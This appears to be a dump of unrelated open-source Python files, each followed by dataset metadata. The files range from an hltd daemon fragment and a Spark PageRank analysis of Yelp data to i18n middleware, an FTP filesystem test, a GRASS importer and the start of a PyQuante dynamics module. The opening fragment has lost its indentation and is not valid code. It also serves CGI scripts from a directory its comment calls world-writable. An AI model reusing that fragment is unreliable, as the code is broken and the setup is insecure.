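                # dirs for cores moving between states (IN_MOVED_TO, handled by
                # process_IN_MOVED_TO)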
rr.register_inotify_path(appliance_base, imask_appl)
rr.register_inotify_path(resource_base+'/idle', imask)
rr.register_inotify_path(resource_base+'/cloud', imask)
rr.register_inotify_path(resource_base+'/except', imask)
rr.start_inotify()
logger.info("started ResourceRanger - watch_directory "+resource_base)
except Exception as ex:
logger.error("Exception caught in starting ResourceRanger notifier")
logger.error(ex)
try:
cgitb.enable(display=0, logdir="/tmp")
handler = CGIHTTPServer.CGIHTTPRequestHandler
# the following allows the base directory of the http
            # server to be conf.watch_directory, which is writeable
# to everybody
if os.path.exists(watch_directory+'/cgi-bin'):
os.remove(watch_directory+'/cgi-bin')
os.symlink('/opt/hltd/cgi',watch_directory+'/cgi-bin')
handler.cgi_directories = ['/cgi-bin']
logger.info("starting http server on port "+str(conf.cgi_port))
httpd = BaseHTTPServer.HTTPServer(("", conf.cgi_port), handler)
logger.info("hltd serving at port "+str(conf.cgi_port)+" with role "+conf.role)
os.chdir(watch_directory)
logger.info("[[[[ ---- hltd instance " + self.instance + ": init complete, starting httpd ---- ]]]]")
logger.info("")
httpd.serve_forever()
except KeyboardInterrupt:
logger.info("stop signal detected")
aRuns = runList.getActiveRuns()
if len(aRuns)>0:
logger.info("terminating all ongoing runs")
for run in aRuns:
if conf.role=='fu':
run.Shutdown(True,True)
elif conf.role=='bu':
run.ShutdownBU()
logger.info("terminated all ongoing runs")
runRanger.stop_inotify()
rr.stop_inotify()
if boxInfo is not None:
logger.info("stopping boxinfo updater")
boxInfo.stop()
global logCollector
if logCollector is not None:
logger.info("terminating logCollector")
logCollector.terminate()
logger.info("stopping system monitor")
rr.stop_managed_monitor()
logger.info("closing httpd socket")
httpd.socket.close()
logger.info(threading.enumerate())
logger.info("unmounting mount points")
if cleanup_mountpoints(remount=False)==False:
time.sleep(1)
cleanup_mountpoints(remount=False)
logger.info("shutdown of service (main thread) completed")
except Exception as ex:
logger.info("exception encountered in operating hltd")
logger.info(ex)
runRanger.stop_inotify()
rr.stop_inotify()
rr.stop_managed_monitor()
raise
if __name__ == "__main__":
import procname
procname.setprocname('hltd')
daemon = hltd(sys.argv[1])
daemon.start()
| lgpl-3.0 | -3,724,914,407,503,321,000 | 42.565243 | 194 | 0.517367 | false | 4.569912 | false | false | false |
firiceguo/Recommendation-NLP | src/network/network.py | 1 | 5711 | #!/usr/bin/python2
# -*- coding: utf-8 -*-
from pyspark.sql.functions import *
from graphframes import *
"""
If you do it on the Jupyter Notebook, do the following config.
%%configure -f
{ "conf": {"spark.jars.packages": "graphframes:graphframes:0.3.0-spark2.0-s_2.11" }}
sc.addPyFile('wasb://[email protected]/graphframes-0.3.0-spark2.0-s_2.11.jar')
"""
def network(sc, spark):
# step1: create graph according to yelp network data
v = spark.read.csv(
'https://[email protected]/yelpNetwork_i.csv', header=True, inferSchema=True)
# v.count() 1029432
e = spark.read.csv(
'wasb://[email protected]/yelpNetwork_e.csv', header=True, inferSchema=True)
# e.count() 29723247
g = GraphFrame(v, e)
# step2: we need to make sure that this graph is a directed graph
# then we can run pagerank algorithm on it
a = g.inDegrees
# b=g.outDegrees.withColumnRenamed('id','out_id')
b = g.outDegrees
# inOut=a.join(b,a['id']==b['out_id'])
inOut = a.join(b, 'id')
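    # ratio = inDegree/outDegree per vertex; bio_ratio is the fraction of
    # vertices with ratio == 1, a rough measure of how bidirectional
    # (i.e. effectively undirected) the friendship graph is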
static = inOut.select(
'*', (inOut['inDegree'] / inOut['outDegree']).alias('ratio')).select('id', 'ratio')
bio_ratio = float(static.filter("ratio=1").count()) / \
float(g.vertices.count())
print bio_ratio
# step3: detect connected component
sc.setCheckpointDir(
'wasb://[email protected]/checkpoint')
result = g.connectedComponents()
r = result.select("id", "component")
r.groupBy('component').count().orderBy('count', ascending=False).show()
# step4: choose the largest connected component, create a new subset
# graph, and run pagerank algorithm on this new graph
subset_0 = result.filter('component=0')
subset_id = subset_0.select('id')
subset_edge = e.join(subset_id, e['dst'] == subset_0['id'], 'leftsemi').join(
subset_id, e['src'] == subset_0['id'], 'leftsemi')
g_cc = GraphFrame(subset_id, subset_edge)
pr = g_cc.pageRank(resetProbability=0.01, maxIter=10)
pr.vertices.select("id", "pagerank").orderBy(
"pagerank", ascending=False).show()
# step5: we want to get the max pagerank vertices for each business, so we
# need (business_id,user_id) pair, extracted from review
review = spark.read.csv(
'wasb://[email protected]/yelpNetwork_b_u.csv', header=True, inferSchema=True)
    # If a business has only a few reviews, distributing coupons according to
    # this network's results would be meaningless: there is not enough data and
    # not enough users to spread influence by cascading. So we first group
    # reviews by business id and keep only businesses with more than 200
    # reviews; for these it is worthwhile to reach the max-pagerank user with
    # coupons or with advertising for new dishes or events.
# in order to avoid spark bug on groupBy, we add withColumnRenamed before
# every groupBy operation
cnt = review.withColumnRenamed('business_id', 'business_id').groupBy(
'business_id').count().filter('count>200')
subset = cnt.join(review, 'business_id')
# pr_results_business=pr.join(subset,pr['id']==subset['user_id']).select("user_id","pagerank","business_id") /
# .withColumnRenamed('business_id','business_id').groupBy('business_id').max()
pr_table = pr.vertices.select("id", "pagerank").orderBy(
"pagerank", ascending=False)
pr_results_business = pr_table.join(
subset, pr_table['id'] == subset['user_id'])
pr_results_business.select("user_id", "pagerank", "business_id").show()
t1 = pr_results_business.select("user_id", "pagerank", "business_id").withColumnRenamed(
'business_id', 'business_id').groupBy('business_id').max()
t2 = t1.join(pr_table, t1['max(pagerank)'] == pr_table['pagerank']).withColumnRenamed(
'id', 'user_id').select('business_id', 'user_id')
t2.show()
# step6: write result into csv file.
# For default setting, spark will write it into multi-csvfile
# distributely, we need to merge them into one csv file.
import os
from subprocess import call
t2.write.format('com.databricks.spark.csv').save(
'wasb://[email protected]/result.csv')
os.system("cat wasb://[email protected]/result/p* > wasb://[email protected]/result.csv")
pr_table.write.format('com.databricks.spark.csv').save(
'wasb://[email protected]/pr.csv')
os.system("cat wasb://[email protected]/pr/p* > wasb://[email protected]/pr.csv")
# evaluation
res = spark.read.csv(
'wasb://[email protected]/result.csv', header=True, inferSchema=True)
cnt = 0
lgt = 0
for row in res.rdd.collect():
id = row['user_id']
print id
con = "a.id='" + id + "'"
con = str(con)
print con
top = g.find(
"(a)-[]->(b);(b)-[]->(c)").filter(con).select("c.id").distinct().count()
print top
test = v.rdd.takeSample(False, 1, seed=cnt)
for t in test:
random = t['id']
con1 = "a.id='" + random + "'"
con1 = str(con1)
random = g.find(
"(a)-[]->(b);(b)-[]->(c)").filter(con1).select("c.id").distinct().count()
print random
if top > random:
lgt = lgt + 1
cnt = cnt + 1
    # ratio: 96.7%, which suggests it is meaningful to use this system to
    # recommend users to businesses
| mit | -1,295,650,255,247,782,100 | 42.930769 | 135 | 0.639993 | false | 3.235694 | false | false | false |
quantrocket-llc/quantrocket-client | quantrocket/cli/utils/output.py | 1 | 1958 | # Copyright 2017 QuantRocket - All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import yaml
import json
import requests
def json_to_cli(func, *args, **kwargs):
"""
Converts a JSON response to a more appropriate CLI response.
If JSON is preferred, the response will be returned as-is. Otherwise:
- If the JSON is a list of scalars, the output will be simplified to a
string of newline-separated values suitable for the command line (unless
simplify_lists is False).
- If the JSON is empty, nothing will be returned.
- YAML will be returned.
"""
exit_code = 0
simplify_list = kwargs.pop("simplify_list", True)
try:
json_response = func(*args, **kwargs)
except requests.exceptions.HTTPError as e:
# use json response from service, if available
json_response = getattr(e, "json_response", {}) or {"status": "error", "msg": repr(e)}
exit_code = 1
if not json_response:
return None, exit_code
if os.environ.get("QUANTROCKET_CLI_OUTPUT_FORMAT", "").lower() == "json":
return json.dumps(json_response), exit_code
if simplify_list and isinstance(json_response, list) and not any([
isinstance(item, (dict, list, tuple, set)) for item in json_response]):
return "\n".join([str(item) for item in json_response]), exit_code
return yaml.safe_dump(json_response, default_flow_style=False).strip(), exit_code
| apache-2.0 | 7,578,797,005,245,311,000 | 38.959184 | 94 | 0.695608 | false | 3.963563 | false | false | false |
limodou/uliweb | uliweb/contrib/i18n/middle_i18n.py | 1 | 3448 | import re
from uliweb.i18n import set_language, format_locale
from uliweb import Middleware
from logging import getLogger
from uliweb.utils.common import request_url
accept_language_re = re.compile(r'''
([A-Za-z]{1,8}(?:-[A-Za-z]{1,8})*|\*) # "en", "en-au", "x-y-z", "*"
(?:;q=(0(?:\.\d{,3})?|1(?:.0{,3})?))? # Optional "q=1.00", "q=0.8"
(?:\s*,\s*|$) # Multiple accepts per header.
''', re.VERBOSE)
def get_language_from_request(request, settings):
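    # Lookup order: URL query parameter -> session -> cookie ->
    # HTTP Accept-Language header -> LANGUAGE_CODE from settings.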
#check query_string, and the key will be defined in settings.ini
#now only support GET method
debug = '__debug__' in request.GET
log = getLogger(__name__)
url_lang_key = settings.get_var('I18N/URL_LANG_KEY')
if url_lang_key:
lang = request.GET.get(url_lang_key)
if lang:
if debug:
log.info('Detect from URL=%s, lang_key=%s, lang=%s' %
(request_url(), url_lang_key, lang))
return lang
#check session
if hasattr(request, 'session'):
lang = request.session.get('uliweb_language')
if lang:
if debug:
log.info('Detect from session=%s, lang=%s' %
('uliweb_language', lang))
return lang
#check cookie
lang = request.cookies.get(settings.I18N.LANGUAGE_COOKIE_NAME)
if lang:
if debug:
log.info('Detect from cookie=%s, lang=%s' %
(settings.I18N.LANGUAGE_COOKIE_NAME, lang))
return lang
#check browser HTTP_ACCEPT_LANGUAGE head
accept = request.environ.get('HTTP_ACCEPT_LANGUAGE', None)
if not accept:
if debug:
log.info('Detect from settings of LANGUAGE_CODE=%s' % lang)
return settings.I18N.get('LANGUAGE_CODE')
languages = settings.I18N.get('SUPPORT_LANGUAGES', [])
for accept_lang, unused in parse_accept_lang_header(accept):
if accept_lang == '*':
break
normalized = format_locale(accept_lang)
if not normalized:
continue
if normalized in languages:
if debug:
log.info('Detect from HTTP Header=%s, lang=%s' %
('HTTP_ACCEPT_LANGUAGE', normalized))
return normalized
    #return default language
lang = settings.I18N.get('LANGUAGE_CODE')
if debug:
log.info('Detect from settings of LANGUAGE_CODE=%s' % lang)
return lang
def parse_accept_lang_header(lang_string):
"""
Parses the lang_string, which is the body of an HTTP Accept-Language
header, and returns a list of (lang, q-value), ordered by 'q' values.
    Any format errors in lang_string result in an empty list being returned.
"""
result = []
pieces = accept_language_re.split(lang_string)
if pieces[-1]:
return []
for i in range(0, len(pieces) - 1, 3):
first, lang, priority = pieces[i : i + 3]
if first:
return []
priority = priority and float(priority) or 1.0
result.append((lang, priority))
result.sort(lambda x, y: -cmp(x[1], y[1]))
return result
class I18nMiddle(Middleware):
def process_request(self, request):
lang = get_language_from_request(request, self.settings)
if lang:
set_language(lang) | bsd-2-clause | 3,296,269,799,420,879,400 | 33.9375 | 79 | 0.560325 | false | 3.784852 | false | false | false |
david-abel/simple_rl | examples/oomdp_example.py | 1 | 1115 | #!/usr/bin/env python
# Python imports.
import sys
# Other imports.
import srl_example_setup
from simple_rl.agents import QLearningAgent, RandomAgent
from simple_rl.tasks import TaxiOOMDP
from simple_rl.run_experiments import run_agents_on_mdp, run_single_agent_on_mdp
def main(open_plot=True):
    # Taxi initial state attributes.
agent = {"x":1, "y":1, "has_passenger":0}
passengers = [{"x":3, "y":2, "dest_x":2, "dest_y":3, "in_taxi":0}]
walls = []
mdp = TaxiOOMDP(width=4, height=4, agent=agent, walls=walls, passengers=passengers)
# Agents.
ql_agent = QLearningAgent(actions=mdp.get_actions())
rand_agent = RandomAgent(actions=mdp.get_actions())
viz = False
if viz:
# Visualize Taxi.
run_single_agent_on_mdp(ql_agent, mdp, episodes=50, steps=1000)
mdp.visualize_agent(ql_agent)
else:
# Run experiment and make plot.
run_agents_on_mdp([ql_agent, rand_agent], mdp, instances=10, episodes=1, steps=500, reset_at_terminal=True, open_plot=open_plot)
if __name__ == "__main__":
main(open_plot=not sys.argv[-1] == "no_plot")
| apache-2.0 | -7,784,361,188,939,700,000 | 32.787879 | 136 | 0.658296 | false | 2.829949 | false | false | false |
pscottdevos/pyfilesystem | fs/tests/test_ftpfs.py | 11 | 3291 | #!/usr/bin/env python
from fs.tests import FSTestCases, ThreadingTestCases
import unittest
import os
import sys
import shutil
import tempfile
import subprocess
import time
from os.path import abspath
import urllib
from six import PY3
try:
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
except ImportError:
if not PY3:
raise ImportError("Requires pyftpdlib <http://code.google.com/p/pyftpdlib/>")
from fs.path import *
from fs import ftpfs
ftp_port = 30000
class TestFTPFS(unittest.TestCase, FSTestCases, ThreadingTestCases):
__test__ = not PY3
def setUp(self):
global ftp_port
ftp_port += 1
use_port = str(ftp_port)
#ftp_port = 10000
self.temp_dir = tempfile.mkdtemp(u"ftpfstests")
file_path = __file__
if ':' not in file_path:
file_path = abspath(file_path)
        # Apparently Windows requires values from default environment, so copy the existing os.environ
env = os.environ.copy()
env['PYTHONPATH'] = os.getcwd() + os.pathsep + env.get('PYTHONPATH', '')
self.ftp_server = subprocess.Popen([sys.executable,
file_path,
self.temp_dir,
use_port],
stdout=subprocess.PIPE,
env=env)
# Block until the server writes a line to stdout
self.ftp_server.stdout.readline()
# Poll until a connection can be made
start_time = time.time()
while time.time() - start_time < 5:
try:
ftpurl = urllib.urlopen('ftp://127.0.0.1:%s' % use_port)
except IOError:
time.sleep(0)
else:
ftpurl.read()
ftpurl.close()
break
else:
# Avoid a possible infinite loop
raise Exception("Unable to connect to ftp server")
self.fs = ftpfs.FTPFS('127.0.0.1', 'user', '12345', dircache=True, port=use_port, timeout=5.0)
self.fs.cache_hint(True)
def tearDown(self):
#self.ftp_server.terminate()
if sys.platform == 'win32':
os.popen('TASKKILL /PID '+str(self.ftp_server.pid)+' /F')
else:
os.system('kill '+str(self.ftp_server.pid))
shutil.rmtree(self.temp_dir)
self.fs.close()
def check(self, p):
check_path = self.temp_dir.rstrip(os.sep) + os.sep + p
return os.path.exists(check_path.encode('utf-8'))
if __name__ == "__main__":
# Run an ftp server that exposes a given directory
import sys
authorizer = DummyAuthorizer()
authorizer.add_user("user", "12345", sys.argv[1], perm="elradfmw")
authorizer.add_anonymous(sys.argv[1])
#def nolog(*args):
# pass
#ftpserver.log = nolog
#ftpserver.logline = nolog
handler = FTPHandler
handler.authorizer = authorizer
address = ("127.0.0.1", int(sys.argv[2]))
#print address
ftpd = FTPServer(address, handler)
sys.stdout.write('serving\n')
sys.stdout.flush()
ftpd.serve_forever()
| bsd-3-clause | -4,249,187,715,346,728,000 | 28.383929 | 103 | 0.576724 | false | 3.844626 | true | false | false |
shenghaozou/PythonGrader | P5/outputCon.py | 1 | 2766 | from openpyxl import Workbook
from webview import WebView
import gradeSettings
class outputControl():
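    # Collects per-student grading results (keeping only the latest submission
    # per student) and writes them out per section, both as an Excel workbook
    # (openpyxl) and as an HTML grading table (WebView).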
def __init__(self, sectionList, name, submissionFolder):
self.sectionList = sectionList
self.name = name
self.database = {}
self.submissionFolder = submissionFolder
self.section = dict([(sect,{'workbook':Workbook(),'webview': WebView(name + '-' + sect + '-' + submissionFolder + '.html', submissionFolder)}) for sect in sectionList])
for key in self.section:
self.section[key]['worksheet'] = self.section[key]['workbook'].active
self.section[key]['webview'].createBody()
self.section[key]['webview'].insertTitle('Auto Grading Sheet For ' + name + ' Section:' + key)
self.section[key]['webview'].createGradingTable()
self.section[key]['worksheet'].append(['Student Name','Student UID','Comment']+ gradeSettings.GRADING_RULES_ORDER)
def close(self):
for key in self.section:
self.section[key]['webview'].endTable()
self.section[key]['webview'].endBody()
self.section[key]['workbook'].save('../' + self.name + '-' + key + '-' + self.submissionFolder +".xlsx")
def insert(self, studentName, studentID, submissionNum, partner, section, errorMessage, detailedGrade, output, fileName):
if studentID in self.database.keys():
print 'insert student:', studentID
if submissionNum < self.database[studentID]['submissionNum']:
return False
self.database[studentID] = {
'studentName':studentName,
'studentID':studentID,
'submissionNum':submissionNum,
'partner':partner,
'section':section,
'errorMessage':errorMessage,
'detailedGrade':detailedGrade,
'output':output,
'fileName':fileName
}
def dump(self):
for key, values in self.database.iteritems():
self.section[values['section']]['webview'].insertGradingTable(values['studentName'],
key,
values['partner'],
sum(values['detailedGrade']),
values['errorMessage'],
values['fileName'])
self.section[values['section']]['worksheet'].append([values['studentName'], key, values['output'].replace(';','\n')] + values['detailedGrade'])
self.close()
| apache-2.0 | 3,316,845,398,057,321,000 | 46.689655 | 176 | 0.530007 | false | 4.886926 | false | false | false |
emoitzi/django-excel-viewer | frontend/migrations/0001_initial.py | 1 | 1147 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('excel_import', '0007_document_current'),
]
operations = [
migrations.CreateModel(
name='ChangeRequest',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, primary_key=True, verbose_name='ID')),
('new_value', models.CharField(max_length=255)),
('old_value', models.CharField(max_length=255, blank=True)),
('created_on', models.DateTimeField(auto_now_add=True)),
('accepted_on', models.DateTimeField(null=True, blank=True)),
('accepted_by', models.ForeignKey(null=True, related_name='+', blank=True, to=settings.AUTH_USER_MODEL)),
('author', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
('target_cell', models.ForeignKey(to='excel_import.Cell')),
],
),
]
| gpl-3.0 | -3,576,765,931,572,799,500 | 38.551724 | 121 | 0.598954 | false | 4.201465 | false | false | false |
pyGrowler/growler-vhost | setup.py | 1 | 1789 | #
# setup.py
#
from setuptools import setup
import growler_vhost
NAME = "growler_vhost"
desc = """The Growler vhost server acts as forwarding agent for HTTP requests to
multiple domains hosted from a single server."""
description = """The Growler vhost server acts as forwarding agent for HTTP
requests to multiple domains hosted from a single server. This is an
implementation of the service using the _Growler_ microframework to handle the
incoming request. As with everything Growler, all events are asynchronous, and
handled when-needed.
This package comes as a binary, which can be run in the form of `growler-vhost
-c <config_file>`, specifying the path to the config file to use as parameters.
I have a hope that optimizations can be made such that forwarding the request to
another growler server takes (almost) no extra resources. As the request can
easily be parsed once into the format that the growler application already uses.
We are a long way from that, though.
"""
REQUIRES = [
'growler'
]
KEYWORDS = [
'vhost',
'virtual server'
]
CLASSIFIERS = [
"Development Status :: 2 - Pre-Alpha",
# "Framework :: Growler",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
"Topic :: Internet :: WWW/HTTP",
"Natural Language :: English"
]
setup(
name=NAME,
version=growler_vhost.__version__,
author=growler_vhost.__author__,
license=growler_vhost.__license__,
    url=growler_vhost.__url__,  # assumes growler_vhost defines __url__
author_email=growler_vhost.__contact__,
description=desc,
long_description=description,
    classifiers=CLASSIFIERS,
install_requires = ['growler'],
packages = ['growler_vhost']
)
| apache-2.0 | -6,473,186,051,370,596,000 | 27.854839 | 80 | 0.711571 | false | 3.914661 | false | false | false |
mfherbst/spack | var/spack/repos/builtin/packages/r-globaloptions/package.py | 5 | 1878 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RGlobaloptions(RPackage):
"""It provides more controls on the option values such as validation and
filtering on the values, making options invisible or private."""
homepage = "https://cran.r-project.org/package=GlobalOptions"
url = "https://cran.rstudio.com/src/contrib/GlobalOptions_0.0.12.tar.gz"
list_url = "https://cran.r-project.org/src/contrib/Archive/GlobalOptions"
version('0.0.12', '6c268b3b27874918ba62eb0f6aa0a3e5')
depends_on('r-testthat', type=('build', 'run'))
depends_on('r-knitr', type=('build', 'run'))
depends_on('r-markdown', type=('build', 'run'))
| lgpl-2.1 | -6,516,717,663,214,309,000 | 45.95 | 81 | 0.676251 | false | 3.872165 | false | false | false |
perfectsearch/sandman | test/buildscripts/disable_unit_test_test.py | 1 | 2851 | #!/usr/bin/env python
#
# $Id: DisabledUnitTestTest.py 4193 2011-01-04 23:19:42Z dhh1969 $
#
# Proprietary and confidential.
# Copyright $Date:: 2011#$ Perfect Search Corporation.
# All rights reserved.
#
import sys, os, _testcase
from unittest2 import TestCase, skip
from codescan.disabled_unit_test import *
from testsupport import checkin, officialbuild
# We're beginning the string constant in an odd way so we don't
# cause this file to show up in the list of those containing
# a disabled unit test.
DESC = '/' + '''*
UNIT TEST TEMPORARILY DISABLED
By: your name
When: 2011-02-27
Ticket: #295
Which: testFoo
Where: all 32-bit platforms
Owner: [email protected], [email protected]
Why: description of problem, including copy-and-paste
from error log
*/'''
PREFIX = '''
#if 0
this is inactive text
#if 1
this is also inactive
#endif
#endif
/**
* some more text that's inactive
*/
''' + DESC
OFFSET = PREFIX.find(DESC)
CPP_SUFFIX1 = '''
// a comment
SIMPLE_TEST(foo)'''
CPP_SUFFIX2 = '''/*
SOME MORE COMMENTS
*/
class SpecialTest: public SomethingTest {
}'''
JAVA_SUFFIX = '''//@Test
public void testSomething() {
}'''
@skip("9/16/2011 this test can't be run until we finish work on the test runner -- Julie Jones")
@officialbuild
class DisabledUnitTestTest(_testcase.TestCaseEx):
    def validateDut(self, dut, errors, txt=None):
errors += self.checkProp(dut, 'ticket', '295')
errors += self.checkProp(dut, 'which', 'testFoo')
errors += self.checkProp(dut, 'where', 'all 32-bit platforms')
errors += self.checkProp(dut, 'when', '2011-02-27')
errors += self.checkProp(dut, 'by', 'your name')
errors += self.checkProp(dut, 'owner', '[email protected], [email protected]')
errors += self.checkProp(dut, 'why', 'description of problem, including copy-and-paste from error log')
        errorsX = self.checkProp(dut, 'lineNum', '11')
        if errorsX and txt is not None:
            self.printWithLineNums(txt)
self.assertEquals(0, errors)
def testDisabledUnitTestPropertiesCppSuffix1(self):
txt = PREFIX + CPP_SUFFIX1
dut = DisabledUnitTest('bar/footest.cpp', txt, OFFSET, OFFSET + len(DESC))
errors = self.checkProp(dut, 'path', 'bar/footest.cpp')
        self.validateDut(dut, errors, txt)
def testDisabledUnitTestPropertiesCppSuffix2(self):
txt = PREFIX + CPP_SUFFIX2
dut = DisabledUnitTest('bar/footest.cpp', txt, OFFSET, OFFSET + len(DESC))
errors = self.checkProp(dut, 'path', 'bar/footest.cpp')
        self.validateDut(dut, errors, txt)
def testDisabledUnitTestPropertiesJavaSuffix(self):
txt = PREFIX + JAVA_SUFFIX
dut = DisabledUnitTest('bar/footest.java', txt, OFFSET, OFFSET + len(DESC))
errors = self.checkProp(dut, 'path', 'bar/footest.java')
        self.validateDut(dut, errors, txt)
| mit | 8,718,279,735,128,515,000 | 30.677778 | 111 | 0.672396 | false | 3.334503 | true | false | false |
AsherBond/MondocosmOS | grass_trunk/scripts/v.in.gns/v.in.gns.py | 2 | 4283 | #!/usr/bin/env python
############################################################################
#
# MODULE: v.in.gns
#
# AUTHOR(S): Markus Neteler, neteler itc it
# Converted to Python by Glynn Clements
#
# PURPOSE: Import GEOnet Names Server (GNS) country files into a GRASS vector map
# http://earth-info.nga.mil/gns/html/
# -> Download Names Files for Countries and Territories (FTP)
#
# Column names: http://earth-info.nga.mil/gns/html/help.htm
#
# COPYRIGHT: (c) 2005 GRASS Development Team
#
# This program is free software under the GNU General Public
# License (>=v2). Read the file COPYING that comes with GRASS
# for details.
#
# TODO: - see below in the code
# - add extra columns explaining some column acronyms,
# e.g. FC (Feature Classification)
#############################################################################
#%module
#% description: Imports US-NGA GEOnet Names Server (GNS) country files into a GRASS vector points map.
#% keywords: vector
#% keywords: import
#% keywords: gazetteer
#%end
#%option G_OPT_F_INPUT
#% description: Name of input uncompressed GNS file from NGA (with .txt extension)
#%end
#%option G_OPT_V_OUTPUT
#% required: no
#%end
import sys
import os
from grass.script import core as grass
from grass.script import vector as vgrass
def main():
fileorig = options['input']
filevect = options['output']
if not filevect:
filevect = grass.basename(fileorig, 'txt')
#are we in LatLong location?
s = grass.read_command("g.proj", flags='j')
kv = grass.parse_key_val(s)
if kv['+proj'] != 'longlat':
grass.fatal(_("This module only operates in LatLong/WGS84 locations"))
#### setup temporary file
tmpfile = grass.tempfile()
coldescs = [("RC", "rc integer"),
("UFI", "uf1 integer"),
("UNI", "uni integer"),
("LAT", "lat double precision"),
("LONG", "lon double precision"),
("DMS_LAT", "dms_lat varchar(6)"),
("DMS_LONG", "dms_long varchar(7)"),
("UTM", "utm varchar(4)"),
("JOG", "jog varchar(7)"),
("FC", "fc varchar(1)"),
("DSG", "dsg varchar(5)"),
("PC", "pc integer"),
("CC1", "cci varchar(2)"),
("ADM1", "adm1 varchar(2)"),
("ADM2", "adm2 varchar(200)"),
("DIM", "dim integer"),
("CC2", "cc2 varchar(2)"),
("NT", "nt varchar(1)"),
("LC", "lc varchar(3)"),
("SHORT_FORM", "shortform varchar(128)"),
("GENERIC", "generic varchar(128)"),
("SORT_NAME", "sortname varchar(200)"),
("FULL_NAME", "fullname varchar(200)"),
("FULL_NAME_ND","funamesd varchar(200)"),
("MODIFY_DATE", "mod_date date")]
colnames = [desc[0] for desc in coldescs]
coltypes = dict([(desc[0], 'integer' in desc[1]) for desc in coldescs])
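    # coltypes maps column name -> True when the SQL type is integer; integer
    # columns get '0' (rather than '') when the value is missing in the input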
header = None
num_places = 0
inf = file(fileorig)
outf = file(tmpfile, 'wb')
for line in inf:
fields = line.rstrip('\r\n').split('\t')
if not header:
header = fields
continue
vars = dict(zip(header, fields))
fields2 = []
for col in colnames:
if col in vars:
if coltypes[col] and vars[col] == '':
fields2.append('0')
else:
fields2.append(vars[col])
else:
if coltypes[col]:
fields2.append('0')
else:
fields2.append('')
line2 = ';'.join(fields2) + '\n'
outf.write(line2)
num_places += 1
outf.close()
inf.close()
grass.message(_("Converted %d place names.") % num_places)
#TODO: fix dms_lat,dms_long DDMMSS -> DD:MM:SS
# Solution:
# IN=DDMMSS
# DEG=`echo $IN | cut -b1,2`
# MIN=`echo $IN | cut -b3,4`
# SEC=`echo $IN | cut -b5,6`
# DEG_STR="$DEG:$MIN:$SEC"
#modifications (to match DBF 10 char column name limit):
# short_form -> shortform
# sort_name -> sortname
# full_name -> fullname
# full_name_sd -> funamesd
# pump data into GRASS:
columns = [desc[1] for desc in coldescs]
grass.run_command('v.in.ascii', cat = 0, x = 5, y = 4, fs = ';',
input = tmpfile, output = filevect,
columns = columns)
grass.try_remove(tmpfile)
# write cmd history:
vgrass.vector_history(filevect)
if __name__ == "__main__":
options, flags = grass.parser()
main()
| agpl-3.0 | -2,912,952,003,685,398,500 | 27.553333 | 102 | 0.571562 | false | 3.063662 | false | false | false |
gabrielelanaro/pyquante | PyQuante/Dynamics.py | 2 | 4332 | """\
Dynamics.py: Module for molecular dynamics
This program is part of the PyQuante quantum chemistry program suite.
Copyright (c) 2004, Richard P. Muller. All Rights Reserved.
PyQuante version 1.2 and later is covered by the modified BSD
license. Please see the file LICENSE that is part of this
distribution.
"""
from NumWrap import array,zeros
from Constants import Rgas
from math import sqrt,pow
from IO import append_xyz
# Derivation of units for Force constant: (Thanks to Alejandro Strachan)
# We have accel in (kcal/mol)/(A*g/mol) and we want it in A/ps^2
# (kcal/mol)/(A*g/mol) = kcal/(A*g) = 1000 kcal/(A*kg)
# = 1000 kcal/(A*kg) * 4.184 J/cal = 4184 kJ/(A*kg)
# = 4.184e6 (kg m^2/s^2)/(A*kg) = 4.184e6 m^2/s^2/A
# = 4.184e26 A/s^2 = 418.4 A/(ps^2)
fconst = 418.4 # convert (kcal/mol)/(A*g/mol) to A/ps^2
# The inverse of this quantity transforms back from amu*(A^2/ps^2) to kcal/mol
def Dynamics(atoms,EnergyForces,nsteps=1000,Ti=298,dt=1e-3):
xyz = open('pyqmd.xyz','w')
dat = open('pyqmd.dat','w')
set_boltzmann_velocities(atoms,Ti)
Etot = 0
for step in xrange(nsteps):
append_xyz(xyz,atoms.atuples(),"PQMD %4d E = %10.4f" % (step,Etot))
try:
Ev,F = EnergyForces(atoms)
except:
print "Using averaging to try and converge"
Ev,F = EnergyForces(atoms,0.5)
set_forces(atoms,F)
LeapFrogUpdate(atoms,dt)
#for atom in atoms: flask.bounce(atom)
Ek = get_kinetic(atoms)
T = get_temperature(atoms)
#rescale_velocities(atoms,Ti) # uncomment for iso-kinetics
Etot = Ev+Ek
print step*dt,Etot,Ev,Ek,T
dat.write("%10.4f %10.4f %10.4f %10.4f %10.4f\n" %
(step*dt,Etot,Ev,Ek,T))
dat.flush()
return
def get_kinetic(atoms):
sum_mv2 = 0
for atom in atoms: sum_mv2 += atom.mass()*atom.v0.squared()
return 0.5*sum_mv2/fconst
# There's a disconnect here, in that the kinetic energy is being
# computed with v0 (v(t)) and the temperature is being computed
